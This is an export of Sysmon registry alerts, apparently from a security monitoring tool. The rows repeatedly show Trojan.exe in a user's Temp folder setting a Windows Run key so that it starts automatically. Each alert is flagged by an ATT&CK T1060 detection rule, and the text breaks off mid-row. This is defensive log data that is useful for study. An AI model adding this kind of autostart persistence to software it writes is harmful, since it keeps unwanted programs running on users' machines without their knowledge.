C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:47.363058900Z"",""eventRecordID"":""1546"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:47.314\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:47.314"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:59.524",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:46.283 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:46.289162000Z"",""eventRecordID"":""1545"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:46.283\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:46.283"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:58.540",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:45.252 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:45.257349000Z"",""eventRecordID"":""1543"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:45.252\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:45.252"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:58.443",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:44.237 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:44.239767200Z"",""eventRecordID"":""1537"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:44.237\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:44.237"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:58.396",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:43.221 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:43.224771900Z"",""eventRecordID"":""1536"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:43.221\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:43.221"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:55.341",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:42.206 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:42.206897300Z"",""eventRecordID"":""1534"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:42.206\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:42.206"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:53.708",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:41.189 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:41.196994800Z"",""eventRecordID"":""1533"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:41.189\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:41.189"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:52.336",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:40.174 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:40.180978500Z"",""eventRecordID"":""1530"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:40.174\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:40.174"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:52.318",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:39.158 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:39.191709000Z"",""eventRecordID"":""1529"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:39.158\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:39.158"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:51.318",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:38.080 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:38.092608500Z"",""eventRecordID"":""1527"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:38.080\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:38.080"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:50.185",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:37.064 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:37.076546700Z"",""eventRecordID"":""1525"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:37.064\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:37.064"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:49.224",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:36.049 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: 